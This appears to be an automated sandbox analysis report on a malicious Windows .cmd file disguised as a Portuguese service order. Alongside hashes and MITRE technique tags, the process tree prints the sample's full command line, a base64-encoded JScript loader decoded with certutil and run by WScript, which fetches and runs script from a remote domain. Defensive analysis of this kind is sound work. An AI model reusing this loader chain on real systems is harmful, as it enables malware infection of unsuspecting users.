538e3d7d577f9c526daf56249932836b4d0717d8629e116788e280f911e0a45b

Analysis

max time kernel
67s
max time network
131s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
20/12/2022, 14:49

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

ORDEM20DE20SERVICO_3723658_257.52281487.681164.08685.cmd
Size

319B
MD5

b12d4bce9bb30df5d98d85e39daa15ef
SHA1

a2d3348ed4e235a56e646b0e62a7269d882bf296
SHA256

a967868888873816b0053ada9296d867a3d990288242747604bbee867817d5ba
SHA512

a5e18c96e689cd52ed5118760e584e58ba1b5b5897984b4891d6a4401fa727738d8997229995eb93e4aa63890806adfd68418d76ce6c891cd26bf99ee68ef468

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
10	4688	WScript.exe
12	4688	WScript.exe
13	4688	WScript.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings	cmd.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4684 wrote to memory of 1868	4684	cmd.exe	79
PID 4684 wrote to memory of 1868	4684	cmd.exe	79
PID 1868 wrote to memory of 4676	1868	cmd.exe	81
PID 1868 wrote to memory of 4676	1868	cmd.exe	81
PID 1868 wrote to memory of 4780	1868	cmd.exe	82
PID 1868 wrote to memory of 4780	1868	cmd.exe	82
PID 4780 wrote to memory of 4688	4780	cmd.exe	83
PID 4780 wrote to memory of 4688	4780	cmd.exe	83

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ORDEM20DE20SERVICO_3723658_257.52281487.681164.08685.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:4684
- C:\Windows\system32\cmd.exe
  cmd C:\Windows\system32\cmd.exe /V/D/c "MD C:\5S7NMAL\>nul&&s^eT YSIZ=C:\5S7NMAL\^5S7NMAL&&echo dmFyIENYbEk9InNjIisiciI7RFhsST0iaXAiKyJ0OmgiO0VYbEk9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDWGxJK0RYbEkrRVhsSSsiLy9lYWlwZy5sdWl6b3R2aW9nb25hbHZlcy5tb20vPzEvIik7>!YSIZ!.^Js&&certutil -f -decode !YSIZ!.^Js !YSIZ!.^Js&&CMD /c !YSIZ!.^Js"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1868
- - C:\Windows\system32\certutil.exe
    certutil -f -decode C:\5S7NMAL\5S7NMAL.Js C:\5S7NMAL\5S7NMAL.Js
    3⤵
    PID:4676
- - C:\Windows\system32\cmd.exe
    CMD /c C:\5S7NMAL\5S7NMAL.Js
    3⤵
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:4780
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\5S7NMAL\5S7NMAL.Js"
      4⤵
      Blocklisted process makes network request
      PID:4688

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\5S7NMAL\5S7NMAL.Js

Filesize
114B

MD5
3ee0f3379b071c18037adb5417d60534

SHA1
3ceb7998471e014d50edb7e919c52cf23e701173

SHA256
a3bdd5f02a682a3cf3188e5c1a0dfed7b599cd5d36ba185d33b7951835cf9884

SHA512
a45259d3f9797e7d34d3da38a002d289dc1883d08ab9bc2041407dad12b01e589e72facce98eb9b678bb83e3e322466f614e0fadc119922af00d0f2714852ad6

Download Submit
C:\5S7NMAL\5S7NMAL.Js

Filesize
114B

MD5
3ee0f3379b071c18037adb5417d60534

SHA1
3ceb7998471e014d50edb7e919c52cf23e701173

SHA256
a3bdd5f02a682a3cf3188e5c1a0dfed7b599cd5d36ba185d33b7951835cf9884

SHA512
a45259d3f9797e7d34d3da38a002d289dc1883d08ab9bc2041407dad12b01e589e72facce98eb9b678bb83e3e322466f614e0fadc119922af00d0f2714852ad6

Download Submit